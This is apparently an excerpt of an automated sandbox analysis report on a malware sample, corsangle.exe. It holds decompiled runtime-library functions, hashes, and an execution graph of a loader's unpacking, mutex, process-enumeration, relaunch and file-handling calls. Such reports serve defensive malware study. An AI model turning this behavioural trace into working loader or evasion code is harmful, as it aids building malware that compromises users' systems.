                                                                              • Opcode ID: cb457a026d881bb88d8cc6d8f63960e69c57a49b7be2ece780bc85038b41956b
                                                                              • Instruction ID: ddd9c204eae0d6a0c714521c960e3e7366f76469196211fbd7500a458658c10e
                                                                              • Opcode Fuzzy Hash: cb457a026d881bb88d8cc6d8f63960e69c57a49b7be2ece780bc85038b41956b
                                                                              • Instruction Fuzzy Hash: 3341B2B2950B049FD320CF6AD885683FBE8FF08714B948A2ED6DEC2A00D775B5488F50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DF9A, Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E0042DF9A(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E0042DD8C( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                                                                              0x0042df9d
                                                                              0x0042dfa2
                                                                              0x0042dfa5
                                                                              0x0042dfaa
                                                                              0x0042dfac
                                                                              0x0042dfaf
                                                                              0x0042dff3
                                                                              0x0042dff3
                                                                              0x0042dff7
                                                                              0x0042e001
                                                                              0x0042e007
                                                                              0x0042e010
                                                                              0x0042e01c
                                                                              0x0042e022
                                                                              0x0042e028
                                                                              0x0042e02c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dfb1
                                                                              0x0042dfb1
                                                                              0x0042dfb1
                                                                              0x0042dfb6
                                                                              0x0042dfd3
                                                                              0x0042dfd8
                                                                              0x0042dfde
                                                                              0x0042dfde
                                                                              0x0042dfe0
                                                                              0x0042dfe3
                                                                              0x0042dfc1
                                                                              0x0042dfc1
                                                                              0x0042dfc8
                                                                              0x0042dfca
                                                                              0x0042dfca
                                                                              0x0042dfc8
                                                                              0x0042dfe7
                                                                              0x0042dfe8
                                                                              0x0042dff1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0042DFF7
                                                                              • LeaveCriticalSection.KERNEL32(?,?), ref: 0042E007
                                                                              • LocalFree.KERNEL32(?), ref: 0042E010
                                                                              • TlsSetValue.KERNEL32(?,00000000), ref: 0042E022
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                              • String ID:
                                                                              • API String ID: 2949335588-0
                                                                              • Opcode ID: 81c19ecc51828a1e5e79cebcbc900f0999c89da0af03d31b34ee2f1d8a77597b
                                                                              • Instruction ID: eb59b6a1cc8b1e2b734c79961075657494e3cade5e43254114fc2358f7367c79
                                                                              • Opcode Fuzzy Hash: 81c19ecc51828a1e5e79cebcbc900f0999c89da0af03d31b34ee2f1d8a77597b
                                                                              • Instruction Fuzzy Hash: 52115B31A00614EFD724CF58EA84F5AB7B4FF05355F61842EF543876A1CBB5A940CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00414D1F, Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00414D1F() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x45bc2c; // 0x0
				_t26 =  *0x45bc3c; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x45bc30; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x45bc44, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x45bc2c =  *0x45bc2c + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x45bc44, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x45bc44, 0,  *0x45bc30, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x45bc3c =  *0x45bc3c + 0x10;
						 *0x45bc30 = _t24;
						_t15 =  *0x45bc2c; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}











                                                                              0x00414d1f
                                                                              0x00414d24
                                                                              0x00414d2f
                                                                              0x00414d65
                                                                              0x00414d65
                                                                              0x00414d7c
                                                                              0x00414d7f
                                                                              0x00414d87
                                                                              0x00414d8a
                                                                              0x00414d9d
                                                                              0x00414da5
                                                                              0x00414da8
                                                                              0x00414dbc
                                                                              0x00414dc0
                                                                              0x00414dc2
                                                                              0x00414dc5
                                                                              0x00414dce
                                                                              0x00414dd1
                                                                              0x00414daa
                                                                              0x00414db4
                                                                              0x00000000
                                                                              0x00414db4
                                                                              0x00414d8c
                                                                              0x00414d8c
                                                                              0x00414d8c
                                                                              0x00414d8c
                                                                              0x00414dd5
                                                                              0x00414d31
                                                                              0x00414d31
                                                                              0x00414d46
                                                                              0x00414d4e
                                                                              0x00414d54
                                                                              0x00414d5b
                                                                              0x00414d60
                                                                              0x00000000
                                                                              0x00414d50
                                                                              0x00414d53
                                                                              0x00414d53
                                                                              0x00414d4e

                                                                              APIs
                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00415310,00000000,?,00000000), ref: 00414D46
                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415310,00000000,?,00000000), ref: 00414D7F
                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00414D9D
                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00414DB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocHeap$FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 3499195154-0
                                                                              • Opcode ID: 76ddc87352e501aeb7364d1561ba76e65eed77cc71c6fbf8ee09cdf843c50fcd
                                                                              • Instruction ID: cd962d8c170feacae1faba079cd58df97f3eec983c759013e3692b5aa082956c
                                                                              • Opcode Fuzzy Hash: 76ddc87352e501aeb7364d1561ba76e65eed77cc71c6fbf8ee09cdf843c50fcd
                                                                              • Instruction Fuzzy Hash: 721137302003059FCB328F29FD45A66BBB5FB84712760492EF592C62A1DF709842CF4C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E21A, Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042E21A(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x45a308 == 0) {
					E0042E1B1();
				}
				_t21 = _a4;
				_t24 = 0x45a110 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x45a154);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x45a170 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x45a154);
				}
				_t13 = 0x45a170 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}






                                                                              0x0042e221
                                                                              0x0042e223
                                                                              0x0042e223
                                                                              0x0042e231
                                                                              0x0042e235
                                                                              0x0042e23f
                                                                              0x0042e248
                                                                              0x0042e24d
                                                                              0x0042e25a
                                                                              0x0042e260
                                                                              0x0042e260
                                                                              0x0042e263
                                                                              0x0042e269
                                                                              0x0042e26d
                                                                              0x0042e275
                                                                              0x0042e27a

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E248
                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E25A
                                                                              • LeaveCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E263
                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4,004239CA), ref: 0042E275
                                                                                • Part of subcall function 0042E1B1: InitializeCriticalSection.KERNEL32(0045A154,0042E228,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0), ref: 0042E1C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterInitialize$Leave
                                                                              • String ID:
                                                                              • API String ID: 713024617-0
                                                                              • Opcode ID: 154627d0f44fbb6f2967661d46d046f1f0d3a6218a6440111358211ba1d8111f
                                                                              • Instruction ID: b5c77500dba09fe0653f4fe42e4c4ada43285f6bba364d30f6cad982437c146d
                                                                              • Opcode Fuzzy Hash: 154627d0f44fbb6f2967661d46d046f1f0d3a6218a6440111358211ba1d8111f
                                                                              • Instruction Fuzzy Hash: 63F0903150031ADFDB109F95FC84B56B7ACFB5431AF401537E60683012DB38E565CAAD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Analysis Process: corsangle.exe PID: 6128 Parent PID: 568 corsangle.exeCOMMON

                                                                              Execution Graph

                                                                              Execution Coverage:4.8%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:575
                                                                              Total number of Limit Nodes:2

                                                                              Graph

                                                                              execution_graph 5204 e537a5 5209 e537c7 5204->5209 5205 e53b7d memset memset 5206 e53bd4 5205->5206 5208 e53bd9 5205->5208 5207 e53c0d memcpy 5206->5207 5206->5208 5207->5208 5209->5205 5225 e5dc85 5226 e5dc88 5225->5226 5227 e51a52 2 API calls 5226->5227 5228 e5dca3 5227->5228 5229 e5db28 lstrlenW 5228->5229 5230 e5dcb2 5229->5230 5231 e51a52 2 API calls 5230->5231 5232 e5dcd1 5230->5232 5233 e5dcf1 _snwprintf 5231->5233 5234 e51a52 2 API calls 5232->5234 5233->5232 5235 e5dd20 _snwprintf 5234->5235 5236 e51b09 5235->5236 5237 e5dd49 DeleteFileW 5236->5237 4559 e30000 4561 e30005 4559->4561 4564 e3002d 4561->4564 4563 e30029 4584 e30467 GetPEB 4564->4584 4567 e30467 GetPEB 4568 e30053 4567->4568 4569 e30467 GetPEB 4568->4569 4570 e30061 4569->4570 4571 e30467 GetPEB 4570->4571 4572 e3006d 4571->4572 4573 e30467 GetPEB 4572->4573 4574 e3007b 4573->4574 4575 e30467 GetPEB 4574->4575 4578 e30089 4575->4578 4576 e300e6 GetNativeSystemInfo 4577 e30109 VirtualAlloc 4576->4577 4582 e300a0 4576->4582 4580 e30135 4577->4580 4578->4576 4578->4582 4579 e303c3 4579->4582 4586 e5da0a 4579->4586 4580->4579 4581 e30384 VirtualProtect 4580->4581 4581->4580 4581->4582 4582->4563 4585 e30045 4584->4585 4585->4567 4604 e5bf42 4586->4604 4588 e5da1b 4607 e5cb34 4588->4607 4590 e5da20 GetModuleFileNameW 4591 e5da40 4590->4591 4610 e51a52 4591->4610 4593 e5da51 _snwprintf 4594 e51b09 4593->4594 4595 e5da6d GetCommandLineW lstrlenW lstrlenW 4594->4595 4599 e5dab1 4595->4599 4596 e5da92 lstrcmpiW 4598 e5daa4 4596->4598 4596->4599 4597 e5dab8 4614 e51cc2 4597->4614 4620 e5bcc2 GetTickCount 4598->4620 4599->4596 4599->4597 4630 e512cd GetPEB 4604->4630 4606 e5cb20 4606->4588 4608 e5d9f6 4607->4608 4609 e512cd GetPEB 4607->4609 4608->4590 4609->4608 4611 e51a70 4610->4611 4632 e514f2 GetProcessHeap RtlAllocateHeap 4611->4632 4613 e51a84 4613->4593 4613->4613 4615 e51cd9 CreateProcessW 4614->4615 4633 e51503 4614->4633 4617 e51cfc 4615->4617 4619 e51d03 ExitProcess 4615->4619 4618 e51d0f CloseHandle CloseHandle 4617->4618 4617->4619 4618->4619 4637 e5b901 GetWindowsDirectoryW 4620->4637 4625 e5bd19 ExitProcess 4626 e5bce9 WaitForSingleObject 4627 e5bd03 4626->4627 4627->4625 4655 e5bc00 4627->4655 4629 e5bd08 WaitForSingleObject 4629->4627 4631 e512e2 4630->4631 4631->4606 4632->4613 4636 e5150b memset 4633->4636 4635 e51509 4635->4615 4636->4635 4638 e5b95f 4637->4638 4640 e5b920 GetVolumeInformationW 4637->4640 4641 e5ba6f 4638->4641 4640->4638 4684 e5b963 4641->4684 4643 e5ba77 4644 e5baeb 4643->4644 4645 e5ba7b WaitForSingleObject 4643->4645 4644->4625 4644->4626 4646 e5ba92 4645->4646 4646->4644 4689 e5b9bc 4646->4689 4648 e5bad3 ReleaseMutex CloseHandle 4648->4644 4649 e5ba9b 4649->4648 4694 e5ba15 4649->4694 4651 e5baa4 4651->4648 4652 e5baa8 SignalObjectAndWait 4651->4652 4653 e5bac5 ResetEvent 4652->4653 4654 e5bac1 4652->4654 4653->4648 4654->4648 4654->4653 4656 e5bc80 4655->4656 4657 e5bc0b 4655->4657 4757 e562bc 4656->4757 4659 e5bc0e 4657->4659 4660 e5bc3a 4657->4660 4661 e5bc11 4659->4661 4662 e5bc29 4659->4662 4732 e58bac 4660->4732 4665 e5bcb4 4661->4665 4666 e5bc18 SetEvent 4661->4666 4699 e5baf0 GetTickCount 4662->4699 4664 e5bc85 4761 e57842 4664->4761 4665->4629 4666->4665 4668 e5bc3f 4736 e598ae 4668->4736 4672 e5bc8a 4765 e5e2c5 4672->4765 4673 e5bc44 4740 e5abaa 4673->4740 4676 e5bc49 4744 e5ac8a 4676->4744 4677 e5bc9d GetTickCount 4677->4629 4679 e5bc4e 4748 e5b81a 4679->4748 4681 e5bc53 4752 e56057 4681->4752 4683 e5bc5a 4683->4665 4683->4677 4685 e51a52 2 API calls 4684->4685 4686 e5b97c _snwprintf 4685->4686 4687 e51b09 4686->4687 4688 e5b99b CreateMutexW 4687->4688 4688->4643 4690 e51a52 2 API calls 4689->4690 4691 e5b9d5 _snwprintf 4690->4691 4692 e51b09 4691->4692 4693 e5b9f4 CreateMutexW 4692->4693 4693->4649 4695 e51a52 2 API calls 4694->4695 4696 e5ba2e _snwprintf 4695->4696 4697 e51b09 4696->4697 4698 e5ba4d CreateEventW 4697->4698 4698->4651 4784 e5e433 4699->4784 4701 e5bb11 lstrlen 4785 e52398 RtlGetVersion GetNativeSystemInfo 4701->4785 4703 e5bb27 4786 e51e04 GetPEB 4703->4786 4705 e5bb2f 4787 e522d2 4705->4787 4711 e5bb55 4712 e5bbe9 4711->4712 4810 e56096 4711->4810 4864 e51532 GetProcessHeap HeapFree 4712->4864 4716 e5bbf1 4865 e51532 GetProcessHeap HeapFree 4716->4865 4717 e5bbc7 GetTickCount 4722 e5bbc5 4717->4722 4718 e5bb70 4721 e5bb83 4718->4721 4838 e5e377 4718->4838 4720 e5bbf9 4720->4629 4845 e5be17 4721->4845 4863 e51532 GetProcessHeap HeapFree 4722->4863 4726 e5bbbb 4862 e51532 GetProcessHeap HeapFree 4726->4862 4728 e5bb8e 4728->4726 4729 e5bbac 4728->4729 4848 e5e332 4728->4848 4729->4726 4855 e5e6d8 4729->4855 4733 e51a52 2 API calls 4732->4733 4734 e59871 LoadLibraryW 4733->4734 4735 e59886 4734->4735 4735->4668 4737 e51a52 2 API calls 4736->4737 4738 e5ab6d LoadLibraryW 4737->4738 4739 e5ab82 4738->4739 4739->4673 4741 e51a52 2 API calls 4740->4741 4742 e5ac53 LoadLibraryW 4741->4742 4743 e5ac68 4742->4743 4743->4676 4745 e51a52 2 API calls 4744->4745 4746 e5b7dd LoadLibraryW 4745->4746 4747 e5b7f2 4746->4747 4747->4679 4749 e51a52 2 API calls 4748->4749 4750 e5b8ca LoadLibraryW 4749->4750 4751 e5b8df 4750->4751 4751->4681 4753 e56093 4752->4753 4754 e5607b 4752->4754 4753->4683 4754->4754 5075 e51ffc 4754->5075 4758 e51a52 2 API calls 4757->4758 4759 e57805 LoadLibraryW 4758->4759 4760 e5781a 4759->4760 4760->4664 4762 e51a52 2 API calls 4761->4762 4763 e58b6f LoadLibraryW 4762->4763 4764 e58b84 4763->4764 4764->4672 4766 e5e2d5 4765->4766 5084 e5dae1 4766->5084 4768 e5e2da 5087 e5dd5d CreateFileW 4768->5087 4772 e5e2ee 5102 e5dc86 4772->5102 4774 e5e2f3 lstrcmpiW 4775 e5e308 4774->4775 4776 e5e30a 4774->4776 4775->4683 5114 e5dfd2 4776->5114 4779 e5e31f 4782 e51cc2 4 API calls 4779->4782 4780 e5e318 5129 e5e138 4780->5129 4783 e5e31d 4782->4783 4783->4683 4784->4701 4785->4703 4786->4705 4866 e51943 CreateToolhelp32Snapshot 4787->4866 4790 e52318 4873 e514f2 GetProcessHeap RtlAllocateHeap 4790->4873 4791 e52305 lstrlenW 4791->4790 4791->4791 4793 e52328 4794 e52376 4793->4794 4797 e52334 lstrcpyW lstrlenW 4793->4797 4798 e5235c 4793->4798 4795 e5238a 4794->4795 4881 e51532 GetProcessHeap HeapFree 4794->4881 4802 e5e68e 4795->4802 4797->4793 4874 e52424 WideCharToMultiByte 4798->4874 4803 e5e6a0 4802->4803 4804 e5bb4a 4803->4804 4894 e514f2 GetProcessHeap RtlAllocateHeap 4803->4894 4806 e5bd75 4804->4806 4807 e5bd87 4806->4807 4895 e514f2 GetProcessHeap RtlAllocateHeap 4807->4895 4809 e5bd91 4809->4711 4896 e55e88 4810->4896 4813 e5620b 4813->4717 4813->4718 4815 e560e9 4816 e56204 4815->4816 4908 e5207b 4815->4908 4964 e51532 GetProcessHeap HeapFree 4816->4964 4820 e561f9 4963 e51532 GetProcessHeap HeapFree 4820->4963 4822 e51a52 2 API calls 4823 e56115 _snwprintf 4822->4823 4824 e5614a 4823->4824 4916 e55f38 4824->4916 4827 e561e6 4962 e51532 GetProcessHeap HeapFree 4827->4962 4833 e561de 4961 e51532 GetProcessHeap HeapFree 4833->4961 4835 e561d3 4960 e51532 GetProcessHeap HeapFree 4835->4960 4839 e5e38d 4838->4839 4844 e5e3d7 4838->4844 4840 e51a52 2 API calls 4839->4840 4841 e5e3a1 _snwprintf 4840->4841 4842 e5e3c7 4841->4842 4843 e51a52 2 API calls 4842->4843 4842->4844 4843->4844 4844->4721 4846 e51503 memset 4845->4846 4847 e5be2d 4846->4847 4847->4728 5024 e5e21b lstrcpyW lstrlenW GetTickCount 4848->5024 4853 e5e371 4853->4729 4854 e51cc2 4 API calls 4854->4853 4857 e5e6ea 4855->4857 4858 e5e74f 4857->4858 5030 e514f2 GetProcessHeap RtlAllocateHeap 4857->5030 5031 e5e50a 4857->5031 5046 e5e4c7 4857->5046 5053 e5bf1a 4857->5053 4858->4726 4862->4722 4863->4712 4864->4716 4865->4720 4867 e519a5 4866->4867 4868 e51961 Process32FirstW 4866->4868 4867->4790 4867->4791 4871 e51989 4868->4871 4869 e5199e CloseHandle 4869->4867 4871->4869 4872 e5197b Process32NextW 4871->4872 4882 e52255 4871->4882 4872->4871 4873->4793 4875 e5244a 4874->4875 4879 e52367 4874->4879 4893 e514f2 GetProcessHeap RtlAllocateHeap 4875->4893 4877 e52451 4878 e52457 WideCharToMultiByte 4877->4878 4877->4879 4878->4879 4880 e51532 GetProcessHeap HeapFree 4879->4880 4880->4794 4881->4794 4883 e5226b 4882->4883 4884 e52273 GetCurrentProcessId 4883->4884 4885 e522c8 4883->4885 4884->4885 4886 e5227e 4884->4886 4885->4871 4886->4885 4887 e52284 GetCurrentProcessId 4886->4887 4887->4885 4888 e5228f 4887->4888 4888->4885 4892 e514f2 GetProcessHeap RtlAllocateHeap 4888->4892 4890 e522a9 4890->4885 4891 e522af lstrcpyW 4890->4891 4891->4885 4892->4890 4893->4877 4894->4804 4895->4809 4897 e55e9c 4896->4897 4965 e514f2 GetProcessHeap RtlAllocateHeap 4897->4965 4899 e55ea8 4900 e55ec8 4899->4900 4966 e527a7 4899->4966 4900->4813 4904 e5626a 4900->4904 4905 e5627c 4904->4905 4976 e514f2 GetProcessHeap RtlAllocateHeap 4905->4976 4907 e56286 4907->4815 4909 e52094 4908->4909 4977 e514f2 GetProcessHeap RtlAllocateHeap 4909->4977 4911 e5214a 4911->4820 4911->4822 4912 e520ad 4912->4911 4915 e520e6 4912->4915 4978 e5151f memcpy 4912->4978 4915->4911 4979 e51532 GetProcessHeap HeapFree 4915->4979 4917 e51503 memset 4916->4917 4918 e55f53 4917->4918 4919 e51a52 2 API calls 4918->4919 4920 e55f62 4919->4920 4980 e55f15 GetTickCount 4920->4980 4922 e55f6b 4923 e51a52 2 API calls 4922->4923 4924 e55f81 _snwprintf 4923->4924 4925 e55fa2 4924->4925 4983 e514f2 GetProcessHeap RtlAllocateHeap 4925->4983 4927 e55fbc 4928 e5603a 4927->4928 4929 e55fd0 GetTickCount 4927->4929 4928->4827 4936 e5140a 4928->4936 4930 e55fec 4929->4930 4984 e514f2 GetProcessHeap RtlAllocateHeap 4930->4984 4932 e55ff6 4933 e5600b 4932->4933 4985 e51e27 GetTickCount 4932->4985 4987 e51532 GetProcessHeap HeapFree 4933->4987 4990 e51345 4936->4990 4940 e514e9 4940->4827 4945 e5215a 4940->4945 4941 e51a52 2 API calls 4943 e51467 4941->4943 4942 e514c4 5000 e51532 GetProcessHeap HeapFree 4942->5000 4943->4942 4994 e51383 4943->4994 4946 e5217a 4945->4946 4952 e52173 4945->4952 4946->4952 5009 e514f2 GetProcessHeap RtlAllocateHeap 4946->5009 4948 e521d6 4948->4952 5011 e51532 GetProcessHeap HeapFree 4948->5011 4949 e5219e 4949->4948 4949->4952 5010 e5151f memcpy 4949->5010 4952->4833 4952->4835 4953 e55ed3 4952->4953 5012 e514f2 GetProcessHeap RtlAllocateHeap 4953->5012 4955 e55eea 4956 e55f0a 4955->4956 5013 e52a73 memset 4955->5013 4956->4835 4958 e55efd 4958->4956 5017 e51532 GetProcessHeap HeapFree 4958->5017 4960->4833 4961->4827 4962->4820 4963->4816 4964->4813 4965->4899 4970 e52727 memset 4966->4970 4968 e527b6 4968->4900 4969 e51532 GetProcessHeap HeapFree 4968->4969 4969->4900 4971 e52759 4970->4971 4975 e52752 4970->4975 4972 e52594 memset memset memset memset 4971->4972 4973 e52770 4972->4973 4974 e52629 8 API calls 4973->4974 4973->4975 4974->4975 4975->4968 4976->4907 4977->4912 4978->4915 4979->4911 4988 e51e8f GetTickCount 4980->4988 4982 e55f2e 4982->4922 4983->4927 4984->4932 4986 e51e44 4985->4986 4986->4933 4987->4928 4989 e51eb0 4988->4989 4989->4982 4991 e51368 4990->4991 4992 e51379 4991->4992 5001 e523e5 MultiByteToWideChar 4991->5001 4992->4941 4992->4942 4995 e5139b 4994->4995 4999 e513e7 4995->4999 5007 e514f2 GetProcessHeap RtlAllocateHeap 4995->5007 4997 e513b0 4997->4999 5008 e51532 GetProcessHeap HeapFree 4997->5008 4999->4942 5000->4940 5002 e52401 5001->5002 5003 e5241e 5001->5003 5004 e514f2 GetProcessHeap RtlAllocateHeap 5002->5004 5003->4992 5005 e52409 5004->5005 5005->5003 5006 e5240f MultiByteToWideChar 5005->5006 5006->5003 5007->4997 5008->4999 5009->4949 5010->4948 5011->4952 5012->4955 5014 e52aa5 5013->5014 5016 e52a9e 5013->5016 5014->5016 5018 e5284f 5014->5018 5016->4958 5017->4956 5019 e52865 5018->5019 5021 e5289b 5018->5021 5020 e52921 memcpy 5019->5020 5019->5021 5023 e52987 5019->5023 5020->5021 5021->5016 5022 e529bf memcpy 5022->5021 5022->5023 5023->5021 5023->5022 5025 e51e8f GetTickCount 5024->5025 5026 e5e255 5025->5026 5027 e5e27e CreateFileW 5026->5027 5028 e5e2a5 WriteFile CloseHandle 5027->5028 5029 e5e2be 5027->5029 5028->5029 5029->4853 5029->4854 5030->4857 5057 e5e439 5031->5057 5034 e5e27e 3 API calls 5035 e5e535 5034->5035 5036 e5e5b0 5035->5036 5061 e51dcb WTSGetActiveConsoleSessionId 5035->5061 5036->4857 5039 e51a52 2 API calls 5040 e5e555 _snwprintf 5039->5040 5041 e5e57b 5040->5041 5065 e51d2b 5041->5065 5043 e5e58e 5044 e5e595 CloseHandle CloseHandle 5043->5044 5045 e5e5a7 CloseHandle 5043->5045 5044->5045 5045->5036 5047 e5e439 3 API calls 5046->5047 5048 e5e4de 5047->5048 5049 e5e27e 3 API calls 5048->5049 5050 e5e4ee 5049->5050 5051 e5e504 5050->5051 5052 e51cc2 4 API calls 5050->5052 5051->4857 5052->5051 5054 e5bf2b 5053->5054 5055 e5bf39 5054->5055 5072 e5be97 5054->5072 5055->4857 5058 e5e44c lstrlenW GetTickCount 5057->5058 5059 e51e8f GetTickCount 5058->5059 5060 e5e475 5059->5060 5060->5034 5062 e51de3 5061->5062 5063 e51dfc 5062->5063 5064 e51df3 CloseHandle 5062->5064 5063->5036 5063->5039 5064->5063 5066 e51503 memset 5065->5066 5067 e51d48 5066->5067 5068 e51da5 CreateProcessW 5067->5068 5069 e51d52 5067->5069 5071 e51d61 5068->5071 5070 e51a52 2 API calls 5069->5070 5070->5071 5071->5043 5073 e51503 memset 5072->5073 5074 e5bead 5073->5074 5074->5055 5076 e51503 memset 5075->5076 5077 e52009 5076->5077 5080 e51f75 5077->5080 5082 e51f94 5080->5082 5081 e51fe6 5081->4683 5082->5081 5083 e51fd7 LocalFree 5082->5083 5083->5081 5085 e51503 memset 5084->5085 5086 e5daf6 GetModuleFileNameW 5085->5086 5086->4768 5088 e5ddd3 5087->5088 5089 e5dd7f CreateFileMappingW 5087->5089 5094 e5ddd6 GetComputerNameW 5088->5094 5090 e5dd93 MapViewOfFile 5089->5090 5091 e5ddcb CloseHandle 5089->5091 5092 e5dda5 GetFileSize RtlComputeCrc32 UnmapViewOfFile 5090->5092 5093 e5ddc4 CloseHandle 5090->5093 5091->5088 